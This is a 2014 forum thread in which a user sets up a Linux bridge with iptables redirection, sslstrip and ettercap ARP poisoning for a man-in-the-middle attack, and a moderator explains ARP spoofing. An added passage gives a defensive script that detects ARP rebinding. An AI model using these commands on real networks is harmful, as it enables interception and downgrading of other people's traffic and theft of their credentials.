Author Topic: mitm  (Read 785 times)

SomeUser
mitm
« on: May 29, 2014, 09:21:41 am »
There is a computer with two interfaces. I am trying to insert it in the middle of the line (trying to implement MITM),
such that one interface faces the router and the other faces another computer.

Code:
iptables --flush
ifconfig eth0 0.0.0.0
ifconfig eth1 0.0.0.0
brctl addbr bridge0
brctl addif bridge0 eth0
brctl addif bridge0 eth1
ifconfig bridge0 192.168.0.199 up

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -i bridge0 -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
cd /pentest/web/sslstrip
perl sslstrip.py -l 8080

Then I try:
Code:
ettercap -Tq -i bridge0
But nothing happens (the terminal where I run ettercap stays empty).
Do I need to implement prompt ARP spoofing or not?
Because all traffic is running through my bridge0 interface. I will be very grateful for the help.
« Last Edit: May 29, 2014, 11:17:06 am by Kulverstukas »

proxx (Global Moderator)
Re: mitm
« Reply #1 on: May 29, 2014, 09:33:59 am »
Not that SSLstrip is very useful these days.
But yes indeed, the client and the gateway (presuming there is any) will know each other because of the ARP table.
Both will do a broadcast saying who they are and will actively look for who has IP address x.x.x.x.
The gateway for example will reply and say that IP address is at FF:FF:FF:FF:FF, the gateway will then make an entry in its ARP table with the MAC address and IP address of the client.
Same goes the other way around.
So if you have that little bridge of yours (which works like a switch) you would need some way of confusing the devices.
Basically lying about your IP address and having them send traffic to you instead.
Since you let this traffic through, neither side will be aware of any such thing going on.

Be aware that if you ARP poison the devices you have to make sure that you send out the correct MAC address for their table, since you are using more than one interface.
The easiest way to do this is to have 2 instances of ARPspoof running, one for each interface.
Makes sense?
« Last Edit: May 29, 2014, 09:36:10 am by proxx »
Wtf were you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage
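A defender-side view of the ARP behaviour described in the reply above, as an added example that is not part of the original thread: it replays ARP replies and flags an IP whose MAC binding changes and a MAC that starts answering for more than one IP. The sample lines are constructed in the style of `tcpdump -n arp` output, and the function name `find_arp_anomalies` is hypothetical.

```python
import re
from collections import defaultdict

# Constructed sample in the style of `tcpdump -n arp` output (not real capture data).
SAMPLE = """\
09:40:01.100000 ARP, Request who-has 192.168.0.1 tell 192.168.0.10, length 28
09:40:01.100400 ARP, Reply 192.168.0.1 is-at 00:11:22:33:44:55, length 28
09:40:02.200000 ARP, Reply 192.168.0.10 is-at 66:77:88:99:aa:bb, length 28
09:40:05.000000 ARP, Reply 192.168.0.1 is-at de:ad:be:ef:00:01, length 28
09:40:05.000300 ARP, Reply 192.168.0.10 is-at de:ad:be:ef:00:01, length 28
09:40:07.000000 ARP, Reply 192.168.0.1 is-at de:ad:be:ef:00:01, length 28
"""

REPLY = re.compile(
    r"^(\S+) ARP, Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-f:]{17})", re.I)


def find_arp_anomalies(text):
    """Return alerts for IP->MAC rebinding and for one MAC claiming several IPs."""
    ip_to_mac = {}                  # last MAC seen per IP, like a host's ARP table
    mac_to_ips = defaultdict(set)   # every IP a given MAC has answered for
    alerts = []
    for line in text.splitlines():
        m = REPLY.match(line)
        if not m:
            continue                # requests carry no "is-at" binding claim
        ts, ip, mac = m.group(1), m.group(2), m.group(3).lower()
        old = ip_to_mac.get(ip)
        if old and old != mac:
            # The binding a host would cache for this IP has just changed.
            alerts.append((ts, "rebind", ip, old, mac))
        ip_to_mac[ip] = mac
        ips = mac_to_ips[mac]
        if ip not in ips:
            ips.add(ip)
            if len(ips) > 1:
                # One MAC now answers for several IPs (e.g. gateway and client).
                alerts.append((ts, "multi-ip", mac, *sorted(ips)))
    return alerts


if __name__ == "__main__":
    for alert in find_arp_anomalies(SAMPLE):
        print(alert)
```

Rebinding also happens legitimately (DHCP address reuse, gateway failover), so alerts like these are normally checked against known gateway MAC addresses before being acted on.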

SomeUser
Re: mitm
« Reply #2 on: May 29, 2014, 03:30:41 pm »
ettercap -Tq -i bridge0 -M arp -L log // //


?

proxx (Global Moderator)
Re: mitm
« Reply #3 on: May 29, 2014, 08:29:56 pm »
Quote from: SomeUser
ettercap -Tq -i bridge0 -M arp -L log // //

?

I think this is rather rude.
You cp some shit from some website, you ask a question, I am nice enough to explain to you some fundamentals and all you reply with is this.
I get the feeling you don't give a shit about how it works, you just want to "hack" someone, gl.

SomeUser
Re: mitm
« Reply #4 on: May 29, 2014, 09:28:29 pm »
Look smart!! I understand how and what works here! This example works with all open protocols (the problem was with another computer)! I need to make it work with SSL; explaining this type of attack is not necessary!
« Last Edit: May 30, 2014, 07:56:10 am by SomeUser »